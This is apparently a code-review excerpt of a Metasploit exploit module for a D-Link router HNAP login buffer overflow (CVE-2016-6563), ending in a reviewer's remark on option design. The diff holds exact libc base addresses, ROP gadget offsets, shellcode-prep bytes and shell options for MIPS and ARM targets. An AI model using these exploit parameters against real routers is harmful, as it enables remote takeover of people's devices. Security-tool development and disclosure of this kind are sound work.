modules/exploits/linux/http/dlink_hnap_login_bof.rb

```diff
@@ -0,0 +1,300 @@
+      },
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib@gmail.com>'         # Vulnerability discovery and Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['linux'],
+      'References'     =>
+        [
+          ['CVE', '2016-6563'],
+          ['US-CERT-VU', '677427'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Nov/38']
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 10 },
+      'Stance'         => Msf::Exploit::Stance::Aggressive,          # we need this to run in the foreground (ARM target)
+      'Targets'        =>
+        [
+          [ 'Dlink DIR-818 / 822 / 823 / 850 [MIPS]',
+            {
+              'Offset'         => 3072,
+              'LibcBase'       => 0x2aabe000,         # should be the same offset for all firmware versions and all routers
+              'Sleep'          => 0x56DF0,            # sleep() offset into libuClibc-0.9.30.3.so
+              'FirstGadget'    => 0x4EA1C,            # see comments below for gadget information
+              'SecondGadget'   => 0x2468C,
+              'ThirdGadget'    => 0x41f3c,
+              'PrepShellcode1' => "\x23\xbd\xf3\xc8", # addi  sp,sp,-3128
+              'PrepShellcode2' => "\x03\xa0\xf8\x09", # jalr  sp
+              'BranchDelay'    => "\x20\x84\xf8\x30", # addi  a0,a0,-2000 (nop)
+              'Arch'           => ARCH_MIPSBE,
+              'Payload'        =>
+                {
+                  'BadChars' => "\x00",
+                  'EncoderType'     => Msf::Encoder::Type::Raw      # else it will fail with SIGILL, this CPU is crippled
+                },
+            }
+          ],
+          [ 'Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]',
+            {
+              'Offset'         => 1024,
+              'LibcBase'       => 0x400DA000,         # we can pick any xyz in 0x40xyz000 (an x of 0/1 works well)
+              'System'         => 0x5A270,            # system() offset into libuClibc-0.9.32.1.so
+              'FirstGadget'    => 0x18298,            # see comments below for gadget information
+              'SecondGadget'   => 0x40CB8,
+              'Arch'           => ARCH_ARMLE,
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Nov 7 2016',
+      'DefaultTarget'   => 0))
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('SLEEP', [true, 'Seconds to sleep between requests (ARM only)', '0.5']),
+        OptString.new('SRVHOST', [true, 'IP address for the HTTP server (ARM only)', '0.0.0.0']),
+        OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']),
+        OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']),
+        OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']),
```

Comment:
if this says not to change it, should it even be an option?  Maybe a hardcoded variable, or an advanced option?  I like moving it to being an advanced option (you can make those... right?)